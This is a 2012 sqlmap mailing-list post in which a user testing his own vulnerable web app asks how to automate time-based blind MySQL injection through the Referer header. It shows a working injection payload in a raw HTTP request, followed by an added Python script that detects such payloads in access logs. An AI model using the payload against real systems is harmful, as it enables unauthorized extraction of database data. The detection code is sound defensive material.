[sqlmap-users] sqlmap SQL blind time-based injection (MySQL)
From: Alton J. <alt...@gm...> - 2012-10-07 21:25:13
In my situation, my vulnerable parameter is Referer in the HTTP headers. I am able to enumerate the username and database name manually, but can someone explain or point me to an article that gives details about sqlmap and time-based with MySQL?

Here is an example of how I was able to enumerate the name. I'm unsure if there's any "custom" way of getting sqlmap to work with this.

Code:

    GET /vulnwebapp/index.php?id=2 HTTP/1.1
    Host: 192.168.127.133
    Proxy-Connection: keep-alive
    User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.79 Safari/537.4
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Referer: '+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

FYI, I'm testing this on a vulnerable web app hosted by myself.

So with the above request, the page sleeps because the first character of the current username is "r", which eventually allows me to change 1,1 to 2,1 and so forth until I figure out that the username is "root."

Is there any way to get sqlmap to assist with this type of attack?

Thanks,
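
Seen from the server side, the request in the post above stands out in an access log because the Referer holds a SQL expression instead of a URL and the response is delayed by the SLEEP(5). The following is an added example, not part of the original post or of sqlmap. It assumes Apache "combined" logging with %D (microseconds) appended, and the names `scan`, `referer_findings` and `SLOW_USEC` are hypothetical.

```python
import re
from urllib.parse import unquote

# Assumed format: Apache "combined" plus %D (response time, microseconds).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?:[^"\\]|\\.)*" (?P<usec>\d+)$'
)
TIMING_RE = re.compile(r'\b(?:sleep|benchmark)\s*\(', re.I)
PROBE_RE = re.compile(r'\b(?:if|substring|substr|mid|ascii|ord)\s*\(', re.I)
URL_RE = re.compile(r'^https?://', re.I)
SLOW_USEC = 4_000_000  # hypothetical threshold; tune to the site's baseline

def referer_findings(referer):
    """Return the reasons a Referer value looks like SQL rather than a URL."""
    value = unquote(referer)
    reasons = []
    if value not in ("", "-") and not URL_RE.match(value):
        reasons.append("not-a-url")
    if TIMING_RE.search(value):
        reasons.append("timing-function")
    if PROBE_RE.search(value):
        reasons.append("conditional-probe")
    return reasons

def scan(lines):
    """Return (line_no, ip, reasons, delayed) for every suspicious entry."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the assumed format
        reasons = referer_findings(m["referer"])
        if reasons:
            hits.append((no, m["ip"], reasons, int(m["usec"]) >= SLOW_USEC))
    return hits

# Constructed sample log; only the Referer on line 2 is taken from the post.
SAMPLE = r"""
192.168.127.1 - - [07/Oct/2012:21:20:01 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "http://192.168.127.133/vulnwebapp/" "Mozilla/5.0" 1800
192.168.127.1 - - [07/Oct/2012:21:20:09 +0000] "GET /vulnwebapp/index.php?id=2 HTTP/1.1" 200 512 "'+IF(SUBSTRING(USER(),1,1)='r',SLEEP(5),1)+'" "Mozilla/5.0" 5003000
192.168.127.1 - - [07/Oct/2012:21:20:30 +0000] "GET /vulnwebapp/report.php HTTP/1.1" 200 90211 "-" "Mozilla/5.0" 6000000
""".strip().splitlines()

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The third sample line is slow but has an empty Referer, so latency alone does not raise a finding. The `delayed` flag only adds weight to an entry whose Referer already looks like SQL.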